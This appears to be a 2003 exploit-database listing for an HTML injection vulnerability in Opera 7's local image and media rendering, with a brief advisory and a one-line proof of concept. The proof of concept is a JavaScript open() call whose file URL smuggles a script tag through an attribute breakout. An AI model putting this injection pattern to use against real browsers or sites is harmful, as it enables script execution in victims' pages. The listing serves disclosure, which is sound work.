Opera 7 - Image Rendering HTML Injection
| EKU-ID: 27706 | CVE: | OSVDB-ID: |
| Author: GreyMagic Software | Published: 2003-02-04 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 27706 | CVE: | OSVDB-ID: |
| Author: GreyMagic Software | Published: 2003-02-04 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/6756/info
It has been reported that, when generating HTML to display images or embedded media, Opera does not correctly format the provided URL or sufficiently encode URLs to local files.
As a result of this lack of sanitization Opera is vulnerable to HTML injection attacks when handling local image or media files.
open("file://localhost/images/file.gif?\"><script>alert(location.href);</script>","","");